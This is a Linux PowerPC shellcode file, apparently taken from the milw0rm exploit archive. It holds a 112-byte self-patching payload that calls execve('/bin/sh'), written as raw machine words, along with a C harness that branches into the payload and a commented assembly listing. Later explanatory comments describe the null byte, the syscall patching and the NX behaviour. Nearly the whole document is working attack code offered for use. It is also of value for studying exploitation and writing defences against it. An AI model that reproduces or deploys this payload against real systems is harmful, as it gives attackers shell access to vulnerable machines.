
linuxppc execve binsh 112 bytes

   1   /*
   2    * Linux PPC shellcode
   3    * execve() of /bin/sh by Palante
   4    */
   5
/*
 * Raw machine code for the PowerPC execve("/bin/sh") payload whose
 * disassembly is in the comment block further down: 28 big-endian 32-bit
 * words = 112 bytes.  "w/ NULL": the `bc 13,28,L2` word (0x41BC0054)
 * contains a 0x00 byte, as the disassembly itself points out.
 *
 * Layout, taken from the disassembly comments (not re-verified by
 * assembling the listing):
 *  - 0x44FFFF02 (words 20 and 22) is "not quite an sc opcode"; the stores
 *    `sth 6,-7(3)` / `sth 6,-15(3)` zero the two 0xFF bytes in the middle of
 *    each word at runtime, which is what the "fix sc opcode" comments mean.
 *  - 0x2F62696E 0x2F73685A is the text "/bin/shZ"; the trailing 'Z' is
 *    overwritten with a NUL by `stbx 6,4,3` (r4 = 7).
 *  - the two trailing 0xFFFFFFFF words are placeholders that receive the
 *    argv pointer and the terminating NULL pointer (`stwx 3,3,4`,
 *    `stwx 6,5,4`).
 *
 * Consequences worth knowing:
 *  - the payload patches itself, so it only runs from memory that is both
 *    writable and executable.  As a non-const global it sits in .data; a
 *    system that enforces W^X / NX on data pages faults here instead of
 *    running it, and a store into an executable page is a detectable event.
 *  - element type `long` is assumed to be 4 bytes (32-bit PPC).  On an LP64
 *    target each word would occupy 8 bytes and the byte stream would no
 *    longer encode the instructions shown in the disassembly.
 */
long shellcode[] = { /* Palante's linuxPPC shellcode w/ NULL*/
   0x7CC63278, 0x2F867FFF, 0x41BC0054, 0x7C6802A6,
   0xB0C3FFF9, 0xB0C3FFF1, 0x38867FF0, 0x38A67FF4,
   0x38E67FF3, 0x7CA52278, 0x7CE72278, 0x7C853A14,
   0x7CC419AE, 0x7C042A14, 0x7CE72850, 0x7C852A14,
   0x7C63212E, 0x7C832214, 0x7CC5212E, 0x7CA52A78,
   0x44FFFF02, 0x7CE03B78, 0x44FFFF02, 0x4BFFFFB1,
   0x2F62696E, 0x2F73685A, 0xFFFFFFFF, 0xFFFFFFFF
};
  15
  16
/*
 * Entry point.  Transfers control straight into the shellcode[] buffer with
 * an unconditional PowerPC branch ("b"); control never comes back here, so
 * main() does not return normally -- the payload ends in an exit system
 * call (syscall 1, per the disassembly comments).
 *
 * Notes:
 *  - `void main()` is non-standard C; `int main(void)` is the portable form.
 *  - a basic asm statement with no operands is implicitly volatile under
 *    GCC, which is why the branch is not optimised away.
 *  - `b` is a relative branch with limited reach (signed 26-bit displacement
 *    on PowerPC), so this assumes shellcode[] is linked close enough to
 *    main() -- presumably true for a small static binary, but not a
 *    guaranteed property of the build.
 */
void main()
{
  __asm__("b shellcode");
}
  21
  22   /*                 disassembly
  23
  24           .section ".text"         # Palante’s LinuxPPC shellcode
  25           .align 2
  26           .globl m
  27           .type    m,@function
  28      m:
  29            xor 6,6,6             # r6 is 0
  30            cmpi 7,0,6,0x7FFF     # do meaningless compare
  31          bc 13,28,L2           # conditional branch to L2 - CAUSES NULL BYTE
  32      L1: mfspr 3,8           # address of /bin/sh into r3 (execve parameter)
  33
  34            sth    6,-7(3)           # fix sc opcode
  35            sth    6,-15(3)          # fix sc opcode
  36
  37            addi   4,6,0x7FF0
  38            addi   5,6,0x7FF4
  39            addi   7,6,0x7FF3
  40            xor    5,5,4             #got 0x4 into r5
  41            xor    7,7,4             #got 0x3 into r7
  42
  43
  44            add 4,5,7                # r4 = 0x7
  45            stbx 6,4,3               # store null after /bin/sh
  46
  47             add 0,4,5                # this makes 11 which is the execve system call
  48           sub 7,5,7                # r7 = 0x1 for exit system call
  49
  50           add 4,5,5                # r4 = 0x8
  51           stwx 3,3,4               # and store pointer to /bin/sh at r3+0x8
  52             add 4,3,4                # r4 = r3 + 0x8 (execve parameter)
  53            stwx 6,5,4             # store NULL pointer
  54          xor 5,5,5              # NULL (execve parameter)
  55          .long   0x44ffff02     # not quite an sc opcode
  56            or 0,7,7               # syscall 1 - exit
  57          .long   0x44ffff02     # not quite an sc opcode
  58
  59    L2:   bl L1                  # branch and link back to L1
  60          .long   0x2F62696E     #/bin/shZ
  61          .long   0x2F73685A
  62          .long   0xffffffff     # this is where pointer to /bin/sh goes
  63          .long   0xffffffff     # this is where null pointer goes
  64
  65    .Lfe1:
  66     .size     m,.Lfe1-m
  67
  68   */
  69
  70   // milw0rm.com [2004-09-12]